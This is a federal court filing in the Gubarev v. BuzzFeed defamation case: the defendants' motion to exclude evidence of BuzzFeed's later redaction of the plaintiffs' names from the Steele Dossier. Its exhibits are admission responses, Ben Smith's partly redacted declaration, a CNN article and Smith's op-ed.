**IN THE UNITED STATES DISTRICT COURT**
**SOUTHERN DISTRICT OF FLORIDA**
**Case No.: 17-cv-60426-UU**

ALEKSEJ GUBAREV, XBT HOLDING S.A.,
AND WEBZILLA, INC.,

    Plaintiffs,

vs.

BUZZFEED, INC. AND BEN SMITH,

    Defendants.

_____/

**DEFENDANTS' MOTION *IN LIMINE* NO. 1 TO**
**EXCLUDE EVIDENCE OR ARGUMENT AS TO BUZZFEED'S POST-PUBLICATION**
**DECISION TO REDACT PLAINTIFFS' NAMES FROM THE DOSSIER AND**
**INCORPORATED MEMORANDUM OF LAW**

    Defendants BuzzFeed, Inc. and Ben Smith hereby move the Court *in limine* for an order excluding from *voir dire*, opening statements, evidence, and closing arguments all references to BuzzFeed's post-publication decision to redact Plaintiffs' names from the Dossier upon receiving the Complaint as evidence of negligence or culpability. Such evidence would be inadmissible pursuant to Federal Rules of Evidence 401, 402, 403, and 407.

**PRELIMINARY STATEMENT**

    Defendants should be precluded from introducing evidence or argument concerning BuzzFeed's post-publication decision to redact Plaintiffs' names from the Dossier because it is irrelevant to any elements of Plaintiffs' claim. Moreover, admission of such evidence or argument would cause unfair prejudice and confuse the jury as to the proper temporal scope of their fault determination. Finally, the subsequent remedial measure of redacting Plaintiff's names cannot be used as evidence of fault.

**ARGUMENT**

    As alleged in Plaintiffs' Complaint, after the Dossier was originally published, and in direct response to Plaintiffs' lawsuit, Defendants redacted Plaintiffs' names and released a statement that said: "We have redacted Mr. Gubarev's name from the published dossier, and apologize for including it." Ex. 1 (BuzzFeed's Responses to Plaintiffs' Requests for Admission),

Response No. 22.  This Court should issue an order excluding this evidence if offered to show either negligence or culpability or for any other purpose because BuzzFeed's post-publication behavior is not relevant to any element of Plaintiffs' claim.

The evidence should be excluded because it is inadmissible pursuant to Federal Rules of Evidence 401, 402, 403 and 407.  Federal Rule of Evidence 401 states that evidence is relevant if it has any tendency to make a fact more or less probable, and that fact is of consequence in determining the action.  Rule 402 states that irrelevant evidence is not admissible.  Even if the evidence is relevant, the court may exclude it if its probative value is substantially outweighed by a danger of unfair prejudice, confusing the issues, misleading the jury, undue delay, wasting time, or needlessly presenting cumulative evidence.  Fed. R. Evid. 403.  *See Brown v. Davis*, 656 F. App'x 920, 921–22 (11th Cir. 2016).  And Rule 407 of the Federal Rules of Evidence specifically provides: "When, after an event, measures are taken which, if taken previously, would have made the event less likely to occur, evidence of the subsequent measures is not admissible to prove negligence or culpable conduct in connection with the event."  An application of these rules requires exclusion of all references to BuzzFeed's post-publication decision to redact Plaintiffs' names from the Dossier upon receiving the Complaint as evidence of negligence or culpability.

*First*, the evidence should be excluded pursuant to Fed. R. Evid. 407 as a subsequent remedial measure which may not be received as an admission of prior culpable conduct.  The primary ground underlying this rule is a social policy of "encouraging people to take, or at least not discouraging them from taking, steps in furtherance of added safety."  Fed. R. Evid. 407 advisory committee's note.  Courts have applied the broad language of this rule "to exclude evidence of subsequent repairs, installation of safety devices, changes in company rules, and discharge of employees."  *Id.*  The principle applies in a libel case as well, because the alternation or elimination of alleged defamatory language "limits the extent of the damage to an individual's reputation, by keeping injurious material from the eyes of new readers."  *World Boxing Council v. Cosell*, 715 F. Supp. 1259, 1267 (S.D.N.Y. 1989).  For these reasons, any evidence or argument concerning BuzzFeed's subsequent decision to redact the Plaintiff's names from the dossier should be excluded because "evidence of a subsequent change in an allegedly libelous text is inadmissible" for the purpose of proving fault.  *Id.*

2

*Second*, it is not relevant to whether Defendants acted with the requisite degree of intent in publishing the Dossier. As a matter of law, whether a defendant acted with the requisite intent in publishing an allegedly defamatory statement, is determined at the time of publication – and not based on any post-publication conduct. *N.Y. Times Co. v. Sullivan*, 376 U.S. 254, 286 (1964) (malice must be shown "at the time of the publication"); *Bose Corp. v. Consumers Union of U.S., Inc.*, 466 U.S. 485, 512 (1984) (evidence must establish that defendant "realized the inaccuracy at the time of publication"). This is certainly true in the actual malice context. In *Shoen v. Shoen*, 48 F.3d 412, 417 n.1 (9th Cir. 1995), for example, the court noted that evidence of the defendant's attitude toward plaintiffs after publication of the alleged libel was of dubious relevance to the issue of constitutional malice, and "sheds little light on the extent of his knowledge or disregard for the truth" at the time of the statement. Similarly, in *Secord v. Cockburn*, 747 F. Supp. 779 (D.D.C. 1990), the court held that even post-publication events showing falsity of a statement are not admissible to prove constitutional malice because "it is hornbook libel law that post-publication events have no impact whatever on actual malice as it bears on this lawsuit since the existence or non-existence of such malice must be determined as of the date of publication." *See also Silvester v. ABC, Inc.*, 650 F. Supp. 766, 779 (1986) ("The statement of an ABC employee that the legal department thought after the broadcast that it might contain libelous material does not, without more, prove that defendants had such thoughts at the time the segment was aired, which is the critical time for purposes of establishing malice."), *aff'd*, 839 F.2d 1491 (11th Cir. 1988); *Herbert v Lando*, 781 F.2d 298, 305–06 (2d Cir. 1986) ("It is self-evident that information acquired after the publication of defamatory material cannot be relevant to the publisher's state of mind of his alleged malice at the time of publication."). Accordingly, BuzzFeed's post-publication conduct has no probative value on the question of whether Defendants acted with actual malice.

It also has no probative value if Plaintiffs are private figures and need to demonstrate that Defendants were grossly irresponsible or negligent in publishing the Dossier. Indeed, courts applying both standards have recognized that the timing of the analysis is the same as that under actual malice – it focuses on the defendant's fault at the time of publication. *See, e.g., Prince v. Fox Television Stations, Inc.*, 36 Misc. 3d 1235(A) (N.Y. Sup. Ct. 2012) ("Caselaw indicates that it is the conduct of defendants *prior to the publication* that is relevant to the inquiry of whether such conduct was grossly irresponsible") (citations omitted); *Brooks v. ABC, Inc.*, 999 F.2d 167,

172 (6th Cir. 1993) (negligence inquiry focuses on negligence at "the time of publication") (citation omitted); *Thomas v. Texas*, 294 F. Supp. 3d 576, 618 (N.D. Tex. 2018) ("Generally, a plaintiff who is a private individual, such as Plaintiff, must show that the defendant acted negligently regarding the truth of the defamatory statement at the time that he published it."), *R&R adopted*, No. 3:17-CV-0348-N-BH, 2018 WL 1254926 (N.D. Tex. Mar. 12, 2018), *appeal dismissed*, No. 18-10448, 2018 WL 4943750 (5th Cir. Sept. 12, 2018).  The decision to redact Plaintiffs' names, therefore, is neither evidence of gross irresponsibility nor negligence.

*Finally*, even if the Court were to find that the evidence is probative (and it is not), the evidence should be excluded because it is unduly prejudicial.  Under Fed. R. Evid. 403, the Court "may exclude relevant evidence if its probative value is substantially outweighed by a danger of one or more of the following: unfair prejudice, confusing the issues, misleading the jury, undue delay, wasting time, or needlessly presenting cumulative evidence."  Fed. R. Evid. 403.  Here, every BuzzFeed witness who testified in this action testified that they believed the Dossier's allegations about Plaintiffs were credible and plausible when they published the document.  *See* Ex. 2 (Smith Declaration) ¶ 19; Ex. 3 (Bensinger Declaration) ¶¶ 17, 20–27; Ex. 4 (Schoofs Declaration) ¶ 13-14; Ex. 5 (Elder Declaration) ¶¶ 5, 6, 9.  Any efforts by Plaintiffs to argue that BuzzFeed's decision to redact Mr. Gubarev's name and apologize in an effort to avoid litigation demonstrated the requisite degree of fault would not only be unsupported by the facts, but could be highly prejudicial.

Accordingly, any evidence or argument concerning BuzzFeed's post-publication conduct must be excluded from trial.

## CONCLUSION

For the foregoing reasons, the Court should preclude Plaintiffs from introducing evidence, testimony, or argument relating to BuzzFeed's post-publication decision to redact Plaintiffs' names from the Dossier.


Dated:  October 29, 2018          Respectfully submitted,

                                  /s/ Katherine M. Bolger
                                  Katherine M. Bolger
                                  Nathan Siegel
                                  Adam Lazier

4

Alison Schary
Davis Wright Tremaine LLP
1251 Avenue of the Americas, 21st Floor
New York, New York 10020
katebolger@dwt.com
nathansiegel@dwt.com
adamlazier@dwt.com
alisonschary@dwt.com

<u>/s/ Roy Black</u>
Roy Black
Jared Lopez
Black, Srebnick, Kornspan & Stumpf, P.A.
201 So. Biscayne Boulevard
Miami, Florida 33131
rblack@royblack.com
jlopez@royblack.com

*Attorneys for Defendants*

## CERTIFICATE OF SERVICE

I hereby certify that a true and correct copy of the foregoing, together with its exhibits, will be served electronically by email on all counsel or parties of record on the service list below this 29th day of October, 2018.

By: /s/ Adam Lazier
Adam Lazier

## SERVICE LIST

Matthew Shayefar
Valentin D. Gurvits
BOSTON LAW GROUP, PC
825 Beacon Street, Suite 20
Newton Centre, Massachusetts 02459
Telephone: 617-928-1806
Facsimile: 617-928-1802
matt@bostonlawgroup.com
vgurvits@bostonlawgroup.com

Evan Fray-Witzer
CIAMPA FRAY-WITZER, LLP
20 Park Plaza, Suite 505
Boston, Massachusetts 02116
Telephone: 617-426-000
Facsimile: 617-423-4855
Evan@CFWLegal.com

Brady J. Cobb
Dylan Fulop
COBB EDDY, PLLC
642 Northeast Third Avenue
Fort Lauderdale, Florida 33304
Telephone: 954-527-4111
Facsimile: 954-900-5507
bcobb@cobbeddy.com
dfulop@cobbeddy.com

Exhibit 1

**IN THE UNITED STATES DISTRICT COURT**
**SOUTHERN DISTRICT OF FLORIDA**
**Case No.: 17-cv-60426-UU**

ALEKSEJ GUBAREV, XBT HOLDING S.A.,
AND WEBZILLA, INC.

   Plaintiffs,

vs.

BUZZFEED, INC. AND BEN SMITH,

   Defendants.

_____/

**DEFENDANT BUZZFEED INC.'S RESPONSES AND OBJECTIONS TO PLAINTIFFS'**
**FIRST SET OF REQUESTS FOR ADMISSION**

      Pursuant to Federal Rule of Civil Procedure 36, Defendant Buzzfeed, Inc. ("BuzzFeed"), by

and through its attorneys, hereby responds and objects as follows to Plaintiffs' First Set of Requests

for Admission (the "Requests").

**RESPONSES AND OBJECTIONS**

**Request No. 1:** Admit that, prior to Buzzfeed's publication of the Dossier, you made no attempt to
    contact Gubarev.

**Response:**  Admitted.

**Request No. 2:** Admit that, prior to Buzzfeed's publication of the Dossier, you made no attempt to
    contact Webzilla.

**Response:** Admitted.

**Request No. 3:** Admit that, prior to Buzzfeed's publication of the Dossier, you made no attempt to
    contact XBT.

**Response:** Admitted.

**Request No. 4:** Admit that, at the time of Buzzfeed's publication of the Dossier, you had no reason
    to believe that the allegations concerning Gubarev in the Dossier were true.

**Response:** Denied.

**Request No. 5:** Admit that, at the time of Buzzfeed's publication of the Dossier, you had no reason to believe that the allegations concerning Webzilla in the Dossier were true.

**Response:** BuzzFeed objects to this request in that it assumes there are allegations in the Dossier

"concerning Webzilla," which BuzzFeed denies.  To the extent any further response is necessary,

BuzzFeed denies this Request.

**Request No. 6:** Admit that, at the time of Buzzfeed's publication of the Dossier, you had no reason to believe that the allegations concerning XBT in the Dossier were true.

**Response:** Denied.

**Request No. 7:** Admit that, at the time of Buzzfeed's publication of the Dossier, you knew that it contained unverified information.

**Response:** Admitted.

**Request No. 8:** Admit that, at the time of Buzzfeed's publication of the Dossier, you knew that it contained false information.

**Response:** BuzzFeed objects to this question as vague and ambiguous. To the extent the question

assumes that all the information in the Dossier was false, BuzzFeed denies this Request, and

otherwise refers Plaintiff to the Article, which identifies a misspelling and fact that BuzzFeed knew

to be false.

**Request No. 9:** Admit that, at the time of Buzzfeed's publication of the Dossier, you had reason to doubt the truth or veracity of portions of the Dossier.

**Response:** BuzzFeed objects to this Request as vague and ambiguous, and notes that the Dossier is

a 35-page document and the Request does not identify which "portions" of the Dossier are being

referenced.

**Request No. 10:** Admit that, at the time of Buzzfeed's publication of the Dossier, you did doubt the truth or veracity of portions of the Dossier.

**Response:** BuzzFeed objects to this Request as vague and ambiguous, and notes that the Dossier is

a 35-page document and it does not identify which "portions" of the Dossier are being referenced.

**Request No. 11:** Admit that, prior to Buzzfeed's publication of the Dossier, you did not redact the names of the Plaintiffs from the Dossier.

**Response:** BuzzFeed objects to this Request to the extent it asserts that the Dossier refers to

Plaintiff Webzilla, Inc., which BuzzFeed denies.

Subject to, and without waiving, the foregoing objection, BuzzFeed admits that it did not

redact the names  "XBT/Webzilla" and "Aleksei GUBAROV" prior to publishing it.

**Request No. 12:** Admit that, prior to Buzzfeed's publication of the Dossier, you had the ability to redact the names of the Plaintiffs from the Dossier.

**Response:** BuzzFeed objects to this Request to the extent it asserts that the Dossier refers to

Plaintiff Webzilla, Inc., which BuzzFeed denies.

Subject to, and without waiving, the foregoing objection, BuzzFeed admits that it had the

technical ability to redact the names "XBT/Webzilla" and "Aleksei GUBAROV" from the Dossier

prior to publishing it.

**Request No. 13:** Admit that, prior to Buzzfeed's publication of the Dossier, you considered the effect publication would have with respect to traffic to website and/or mobile platforms for Buzzfeed.

**Response:** Admitted.

**Request No. 14:** Admit that, prior to Buzzfeed's publication of the Dossier, you considered the potential financial benefit to Buzzfeed in publishing the Dossier.

**Response:** Denied.

**Request No. 15:** Admit that, prior to Buzzfeed's publication of the Dossier, you considered the benefits to Buzzfeed in being the first to publish the Dossier.

**Response:** Admitted.

**Request No. 16:** Admit that, prior to Buzzfeed's publication of the Dossier, you knew that other media outlets had refused to publish the Dossier.

**Response:** BuzzFeed objects to this Request's reference to other media outlets' alleged "refus[al] to publish the Dossier" as vague and ambiguous.  To the extent any further response is necessary, this request is denied.

**Request No. 17:**        Admit that, prior to Buzzfeed's publication of the Dossier, you knew that other media outlets had refused to publish the Dossier because the information contained therein was unverified.

**Response:** BuzzFeed objects to this Request's reference to other media outlets' alleged "refus[al] to publish the Dossier" as vague and ambiguous.  To the extent any further response is necessary, this request is denied.

**Request No. 18:** Admit that Buzzfeed's publication of the Dossier resulted in financial benefit to Buzzfeed.

**Response:** Denied.

**Request No. 19:** Admit that Buzzfeed's publication of the Dossier resulted in increased advertising revenue for Buzzfeed.

**Response:** Denied.

**Request No. 20:** Admit that Buzzfeed's publication of the Dossier resulted in increased traffic to the Buzzfeed website.

**Response:**   BuzzFeed objects to this request as vague and ambiguous.

**Request No. 21:** Admit that Buzzfeed's publication of the Dossier resulted in increased traffic to Buzzfeed's mobile platform.

**Response:** BuzzFeed objects to this request as vague and ambiguous.

**Request No. 22:** Admit that, after the filing of the present action, Buzzfeed apologized to Gubarev.

**Response:** BuzzFeed admits that it released the following statement on February 3, 2017: "We have redacted Mr. Gubarev's name from the published dossier, and apologize for including it," and otherwise denies this Request.

{01073176;v4}                                    4

**Request No. 23:** Admit that, after the filing of the present action, Buzzfeed redacted the names of the Plaintiffs from the Dossier

**Response:** BuzzFeed objects to this Request to the extent it asserts that the Dossier refers to

Plaintiff Webzilla, Inc., which BuzzFeed denies.

Subject to, and without waiving, the foregoing objection, BuzzFeed admits that it redacted

the words "XBT/Webzilla" and "Aleksei GUBAROV" from the Dossier on February 3, 2017.

**Request No. 24:** Admit that Buzzfeed has never issued a retraction of the allegations contained in the Dossier concerning the Plaintiffs

**Response:** Admitted.

Dated:  July 17, 2017          Respectfully submitted,

*/s/ Katherine M. Bolger*
Katherine M. Bolger
(admitted *pro hac vice*)
Nathan Siegel
(admitted *pro hac vice*)
Adam Lazier
(admitted *pro hac vice*)
LEVINE SULLIVAN KOCH & SCHULZ, LLP
321 West 44th Street, Suite 1000
New York, NY 10036
Tel:  (212) 850-6100

Lawrence A. Kellogg, P.A.
Jezabel P. Lima
LEVINE KELLOGG LEHMAN SCHNEIDER +
GROSSMAN LLP
201 South Biscayne Boulevard
Miami Center, 22nd Floor
Miami, FL 33131
Tel: (305) 403-8788

*Counsel for Defendants*

# Exhibit 2

**IN THE UNITED STATES DISTRICT COURT**
**SOUTHERN DISTRICT OF FLORIDA**
**Case No.: 17-cv-60426-UU**

ALEKSEJ GUBAREV, XBT HOLDING S.A.,
AND WEBZILLA, INC.

   Plaintiffs,

vs.

BUZZFEED, INC. AND BEN SMITH,

   Defendants.

_____/

**DECLARATION OF BEN SMITH**
**IN SUPPORT OF MOTION FOR SUMMARY JUDGMENT**

I, Ben Smith, declare as follows:

1.     I submit this declaration in support of the motion for summary judgment of Defendants BuzzFeed, Inc. and me (the "Defendants"). I am familiar with the facts herein and make this declaration from my own personal knowledge.

2.     I am the Editor-in Chief of BuzzFeed News and I was when we published the story "These Reports Allege Trump Has Deep Ties To Russia," which was published on January 10, 2017 (the "Article"). Embedded in the Article is the 35-page document written by Christopher Steele that has come to be known as the Dossier.

3.     After I graduated from college, I got my first job in journalism as the Pulliam Fellow for the *Indianapolis Star* where I primarily covered the crime beat.

4.     At the end of the three-month fellowship, I moved to Riga, Latvia, to work as a reporter for *The Baltic Times* for several months. I also began reporting as a stringer for the *Wall Street Journal Europe*, a job which I had for two years.

5.      In 2002, I took a job working at the *New York Sun*, where I covered New York City Hall.  I worked there until 2003.  In 2003, I took a job at the *New York Observer*, where I also covered New York City politics.  In 2006, I joined the *New York Daily News*, where I wrote a political column. Between 2004 and 2006, I also started three New York City political blogs, the <u>Politicker</u>, the Daily Politics, and Room Eight.

6.      I then left the *Daily News* and wrote for the news outlet *Politico* from 2008 to 2011.  In December 2011, I was named Editor-in-Chief of BuzzFeed News, beginning work there in 2012.

7.      I first became aware that the FBI apparently had some information regarding then presidential candidate Donald Trump's alleged ties to Russia in October 2016, when I learned that Senator Harry Reid had written a public letter to then-FBI Director James Comey in which he stated that the FBI allegedly possessed explosive information about such ties.

8.      I also read an article written by David Corn that was published in *Mother Jones* on October 31, 2016, entitled "A Veteran Spy Has Given the FBI Information Alleging a Russian Operation to Cultivate Donald Trump:  Has the bureau investigated this material?".  The article reported that reported, among other things, that a "a former senior intelligence officer for a Western country who specialized in Russian counterintelligence tells *Mother Jones* that in recent months he provided the bureau with memos, based on his recent interactions with Russian sources, contending the Russian government has for years tried to co-opt and assist Trump—and that the FBI requested more information from him."

9.      On December ██, 2016, a confidential source told me some information about the existence of an alleged Dossier about ties between then President-elect Trump and Russia.  ██ ████████████████████████ may have a copy and that ██████ had talked to several other

news organizations about it. ████████████████████████████████████

████████████████████████████████████████████████

10.     I was familiar with ██████████████ from my time covering politics in

Washington, D.C. ███████████████████████████████████

████████████████████████████████████████████████

████████████████████████████████████████

11.     I sent an e-mail to Mark Schoofs, the head of BuzzFeed's investigative reporting

team, and Aram Roston, one of our reporters, with this information and ████████████

████████████████████████████

12.     On December ██, 2016, I received a copy of the Dossier from Mark Schoofs,

which I learned had been obtained by Ken Bensinger ██████████. ████████████ ██

██████ ████████████████████████████████████ ████████

████████████████████████████████████████████

████████████████████████████████

13.     I read the Dossier and discussed with Mark Schoofs and Miriam Elder,

BuzzFeed's world editor who has particular expertise in reporting about Russia, about how to

begin investigating it.  We discussed investigating a few specific allegations that we thought we

might be able to prove or disprove.   I recall discussing the allegation that Michael Cohen had

met with Russian agents in Prague, and the allegations about pension distributions to Russian

emigrants as cover for illegal activity.

14.     We did not publish the Dossier at that point, because we wanted to investigate

some specific allegations and see where those investigative efforts led.  Mark and Miriam were

directly involved in spearheading our investigation.  I knew generally that we were making efforts to verify allegations in the Dossier, but I do not know all the specifics of those actions.

15.     On January 10, 2017, CNN published a report, both on television and on its website, which revealed in broad terms what the Dossier was and what it alleged.  CNN reported that the Dossier had become the subject of recent briefings given by senior intelligence officials to President Obama and President-elect Trump, including a two-page synopsis that had been shared with them.  CNN also reported that the Dossier was the subject of a government investigation.  The article as it appeared prior to BuzzFeed's publication of the Dossier is attached hereto as Exhibit 1.

16.     Shortly after CNN published its article, I met with Mark Schoofs, Miriam Elder, and BuzzFeed Executive Editor Shani Hilton in New York to discuss whether to publish the Dossier itself.  I made the final decision to publish the Dossier because I believed that the information reported in the CNN story made the Dossier itself, rather than the allegations therein, an important story.  From the CNN report, we learned that the Dossier had been briefed to the President and the President elect and was being investigated seriously by the government.  The CNN report made clear that the Dossier was affecting the conduct of people at the highest level of the American government, including also Senators Reid and McCain.  I believed then, and still believe now, that the public had a right to see the specifics of these documents that were informing the action of their government at the highest levels.  My reasons for publishing the Dossier are set out in more detail in an op-ed article I wrote in *The New York Times* on January 23, 2017, which is attached hereto as Exhibit 2.

17.     I recall that the others in New York agreed with the decision to publish the Dossier.  Ken Bensinger, who we talked to on the telephone, initially raised a concern that we

might be sued.  He also asked for some additional time before we published the document to contact sources to let them know it would be published.  I thought that Ken's concern was well-considered, but concluded we should publish it as soon as we had a final draft of a story that the Dossier itself would accompany.

18.     We also agreed, however, that the story we wanted to report in light of these new developments was not the story we had been investigating up to that point, which was trying to ascertain the truth or falsity of underlying allegations within the Dossier.  Rather, the story we now wanted to report was a different one, a story explaining to readers what the Dossier was and how it was affecting government actions.

19.     When we published the Dossier, I knew that some of the specific factual allegations it made had, in broad outline, been confirmed by government agencies and press reports.  For example, the allegation that Russia was behind the hack of Democratic party operatives and release of emails to Wikileaks had been confirmed in multiple public reports.  The allegation that Carter Page had actually met with Russian officials in Moscow had also been reported by other news organizations.  And it was apparent to me that Christopher Steele was able to report this information before Western intelligence agencies could.  I also had familiarized myself with Mr. Steele's reputation, and the CNN report made clear that the document was being taken seriously at high levels of government.  The fact that well-regarded persons from both parties were apparently taking the document seriously, ████████████ ████████████████.  That knowledge contributed to my personal belief that Mr. Steele's claims were credible.

20.     As the Article explained, however, what we regarded as the Dossier's core claims were "allegations that the Russian government has been "cultivating, supporting and assisting"

President-elect Donald Trump for years and gained compromising information about him" and "allegations of contact between Trump aides and Russian operatives, and graphic claims of sexual acts documented by the Russians." Because we had not independently verified those allegations, we thought it important not to present them as established fact or editorialize about any of our personal views. Rather, we wanted to make clear that those allegations had not been verified or disproven. We also noted a couple of factual errors Miriam Elder had found, and explained to readers that the Dossier had been "prepared by political opponents of President-elect Trump." After the Dossier was published, BuzzFeed redacted certain names because of concerns about the safety of certain sources.

21.      I understood that information could and likely would lead reasonable readers to have different views about the Dossier's key claims – some would doubt or distrust their veracity, while others would be more inclined to credit them. But we thought it important to try to present the Dossier in a neutral manner so that, as the Article said, readers could draw their own conclusions.

22.      Before reading the Dossier, I do not think I had heard of Aleksej Gubarev, XBT, or Webzilla. The specific allegations about "Gubarov" and "XBT/Webzilla" struck me as credible and plausible. They were specific details about a broader allegation which had been publicly investigated and confirmed - that Russia was responsible for the Democratic hack. They also were details relating to the Dossier's broader allegations about Michael Cohen, which I thought were consistent with Cohen's known role as Trump's "fixer." I had no awareness that the allegations about the Plaintiffs were false or probably false, nor did I have serious doubts about their accuracy.

23.     I was and remain convinced that publishing the Dossier was the right thing to do. I believe it would be impossible to understand what has happened in our nation had the Dossier not been published.  The public would not fully understand President Trump's firing of Comey, or his anger at federal law enforcement agencies, Carter Page's public statements or the basis for the report entitled  "Foreign Intelligence Surveillance Act Abuses at the Department of Justice and the Federal Bureau of Investigation" issued by Devin Nunes.  Had BuzzFeed not published the Dossier on January 10, 2017, I have no doubt that it would have inevitably been published at some point shortly thereafter, given the central role it was playing and would continue to play in political evens by that point.

I declare under penalty of perjury that the foregoing is true and correct.

Executed on:  September ___, 2018

_____

Ben Smith

# Exhibit 1
# to Smith Declaration

# Intel chiefs presented Trump with claims of Russian efforts to compromise him

By **Evan Perez**, **Jim Sciutto** and **Jake Tapper** and **Carl Bernstein, CNN**

🕐 Updated 5:09 PM ET, Tue January 10, 2017

**(CNN) —** Classified documents presented last week to President Obama and President-elect Trump included allegations that Russian operatives claim to have compromising personal and financial information about Mr. Trump, multiple US officials with direct knowledge of the briefings tell CNN.

The allegations were presented in a two-page synopsis that was appended to a report on Russian interference in the 2016 election. The allegations came, in part, from memos compiled by a former British intelligence operative, whose past work US intelligence officials consider credible. The FBI is investigating the credibility and accuracy of these allegations, which are based primarily on information from Russian sources, but has not confirmed many essential details in the memos about Mr. Trump.

The classified briefings last week were presented by four of the senior-most US intelligence chiefs -- Director of National Intelligence James Clapper, FBI Director James Comey, CIA Director John Brennan, and NSA Director Admiral Mike Rogers.

One reason the nation's intelligence chiefs took the extraordinary step of including the synopsis in the briefing documents was to make the President-elect aware that such allegations involving him are circulating among intelligence agencies, senior members of Congress and other government officials in Washington, multiple sources tell CNN.

These senior intelligence officials also included the synopsis to demonstrate that Russia had compiled information potentially harmful to both political parties, but only released information damaging to Hillary Clinton and Democrats. This synopsis was not an official part of the report from the intelligence community case about Russian

hacks, but some officials said it augmented the evidence that Moscow intended to harm Clinton's candidacy and help Trump's, several officials with knowledge of the briefings tell CNN.

The two-page synopsis also included allegations that there was a continuing exchange of information during the campaign between Trump surrogates and intermediaries for the Russian government, according to two national security officials.

Sources tell CNN that these same allegations about communications between the Trump campaign and the Russians, mentioned in classified briefings for congressional leaders last year, prompted then-Senate Democratic Leader Harry Reid to send a letter to FBI Director Comey in October, in which he wrote, "It has become clear that you possess explosive information about close ties and coordination between Donald Trump, his top advisors, and the Russian government -- a foreign interest openly hostile to the United States."

CNN has confirmed that the synopsis was included in the documents that were presented to Mr. Trump but cannot confirm if it was discussed in his meeting with the intelligence chiefs.

The Trump transition team declined repeated requests for comment.

CNN has reviewed a 35-page compilation of the memos, from which the two-page synopsis was drawn. The memos originated as opposition research, first commissioned by anti-Trump Republicans, and later by Democrats. At this point, CNN is not reporting on details of the memos, as it has not independently corroborated the specific allegations. But, in preparing this story, CNN has spoken to multiple high ranking intelligence, administration, congressional and law enforcement officials, as well as foreign officials and others in the private sector with direct knowledge of the memos.

Some of the memos were circulating as far back as last summer. What has changed since then is that US intelligence agencies have now checked out the former British intelligence operative and his vast network throughout Europe and find him and his sources to be credible enough to include some of the information in the presentations to the President and President-elect a few days ago.

On the same day that the President-elect was briefed by the intelligence community, the top four Congressional leaders, and chairmen and ranking members of the House and Senate intelligence committees -- the so-called "Gang of Eight" -- were also provided a summary of the memos regarding Mr. Trump, according to law enforcement, intelligence and administration sources.

The two-page summary was written without the detailed specifics and information about sources and methods included in the memos by the former British intelligence official. That said, the synopsis was considered so sensitive it was not included in the classified report about Russian hacking that was more widely distributed, but rather in an annex only shared at the most senior levels of the government: President Obama, the President-elect, and the eight Congressional leaders.

CNN has also learned that on December 9, Senator John McCain gave a full copy of the memos -- dated from June through December, 2016 -- to FBI Director James Comey. McCain became aware of the memos from a former British diplomat who had been posted in Moscow. But the FBI had already been given a set of the memos compiled up to August 2016, when the former MI6 agent presented them to an FBI official in Rome, according to national security officials.

The raw memos on which the synopsis is based were prepared by the former MI6 agent, who was posted in Russia in the 1990s and now runs a private intelligence gathering firm. His investigations related to Mr. Trump were initially funded by groups and donors supporting Republican opponents of Mr. Trump during the GOP primaries, multiple sources confirmed to CNN. Those sources also said that once Mr. Trump became the nominee, further investigation was funded by groups and donors supporting Hillary Clinton.

Spokespeople for the FBI and the Director of National Intelligence declined to comment. Officials who spoke to CNN declined to do so on the record given the classified nature of the material.

Some of the allegations were first reported publicly in Mother Jones one week before the election.

One high level administration official told CNN, "I have a sense the outgoing administration and intelligence community is setting down the pieces so this must be investigated seriously and run down. I think [the] concern was to be sure that whatever information was out there is put into the system so it is evaluated as it should be and acted upon as necessary."

# Exhibit 2
# to Smith Declaration

# The New York Times

**OP-ED CONTRIBUTOR**

# Why BuzzFeed News Published the Dossier

**By Ben Smith**

Jan. 23, 2017

Since BuzzFeed News published a 35-page dossier of unverified allegations about ties between President Donald J. Trump and Russia, I've heard a chorus of criticism from journalists who say we abdicated our role as gatekeeper, and a chorus of thanks from readers who want to be trusted to judge dubious documents.

BuzzFeed News decided to publish the dossier, with appropriate context and caveats, for two related reasons, and only after we had spent weeks with reporters in the United States and Europe trying to confirm or disprove specific claims.

First, the documents were in wide circulation among top intelligence and elected officials and news organizations. They were being fought over — and acted on — at the highest levels of power. But the rest of the country was getting only the occasional glimpse of those battles, never the source documents themselves.

"The only party to this whole affair that didn't know about it, it seems, was the public," as the newspaper editor Seth Lipsky wrote in The Wall Street Journal.

Second, the dossier's contents spilled into view last week when CNN broke the news that both President Obama and Mr. Trump had received an intelligence briefing that included a synopsis of the document, whose allegations CNN summarized as "compromising personal and financial information about Mr. Trump."

We at BuzzFeed News had, of course, considered that someone else would post the dossier, and planned in that case to follow by adding what we knew on it. We hadn't anticipated what actually happened: a bombshell report that described the document, while the document itself remained secret.

That halfway position ran contrary to how we think of our compact with our audience: You trust us to give you the full story; we trust you to reckon with a messy, sometimes uncertain reality. And with other news organizations already trumpeting the dossier's central allegation — that the Trump campaign maintained secret ties to the Russian leadership — our decision to publish it in full rapidly advanced the story.

The public soon learned the tale of the former spy who compiled the dossier and his earnest efforts to publicize it; of the F.B.I.'s knowledge of it before the election; and of Senator John McCain's also passing it to the F.B.I. in December. BuzzFeed News reported that foreign intelligence agencies are investigating its allegations. Whether reporters from Washington to Budapest succeed in verifying its claims or otherwise does not diminish the compelling public interest in the story — or the presumptive right of the public, and not just a Beltway elite, to see the document.

The incoming administration dismissed CNN and BuzzFeed News's report as "fake news," a term now used by partisans and cynics to discredit reporting they don't like. We should have seen that coming. BuzzFeed News's reporting helped popularize the term to describe a new breed of fraudsters. But the dossier is a real document that has been influencing senior officials, lawmakers, intelligence agencies and, potentially, the new commander in chief. Nobody should fall for this attempt to turn the press on itself by making a reasonable debate about transparency into a media civil war.

News organizations should instead consider this reality: Our audience inhabits a complex, polluted information environment; our role is to help them navigate it — not to pretend it doesn't exist. The need to show our work and earn trust has never been more important, since once reliable official sources are peddling "alternative facts" — as the White House press secretary did Saturday.

If I were to design a media ecosystem from scratch, it wouldn't be this one. And I certainly did not anticipate this environment in the utopian, early days of digital journalism 15 years ago. The web was supposed to allow powerful media organizations to build trust and connections to their audience by sharing their knowledge and sources. The audience could hold power to account. At its best, that kind of transparency has been powerful.

Today, we can see a dystopian path clearly, too. Every Facebook user encounters a profusion of sources and claims. If the presidential campaign did nothing else, it gave Americans reason to read carefully, exercise judgment and view with skepticism what they heard — even from the most powerful man in the nation.

Case 0:17-cv-60426-UU   Document 203-2   Entered on FLSD Docket 11/05/2018   Page 16 of 16

There is an instinct, easy to understand, to turn away from this chaos. Some legacy media organizations have reacted to the new challenges by retreating to traditional reporting procedures of ostentatious, and sometimes false, balance and voice-of-God authority. Their theory is that the media can confront power by engaging in a theater of traditional journalism and proving their purity and incorruptibility — in short, hew to the same rules that got them steamrollered in 2016.

